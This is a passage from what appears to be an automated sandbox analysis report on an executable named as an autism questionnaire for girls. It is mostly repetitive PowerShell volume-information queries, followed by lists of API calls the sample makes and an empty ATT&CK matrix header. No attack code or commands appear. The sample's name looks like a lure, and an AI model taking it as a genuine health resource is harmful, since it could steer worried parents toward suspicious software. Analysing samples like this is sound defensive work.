            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,0_2_0040B044
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: GetLocaleInfoW,0_2_0041E034
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: GetLocaleInfoW,0_2_0041E080
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: GetLocaleInfoW,0_2_004AF218
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0040A4CC
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: GetUserDefaultUILanguage,GetLocaleInfoW,3_2_0040E7F0
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: GetLocaleInfoW,3_2_006103F8
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_0040DC78
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_00405AE0 cpuid 0_2_00405AE0
            Source: C:\Users\user\AppData\Local\Temp\is-MNCMI.tmp\Girls-Questionnaire-For-Autism-Spectrum-Disorders.tmpCode function: 3_2_00625754 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeW,GetLastError,CreateFileW,SetNamedPipeHandleState,CreateProcessW,CloseHandle,CloseHandle,3_2_00625754
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_0041C3D8 GetLocalTime,0_2_0041C3D8
            Source: C:\Users\user\Desktop\Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeCode function: 0_2_004B5114 GetModuleHandleW,GetVersion,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetProcessDEPPolicy,0_2_004B5114

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
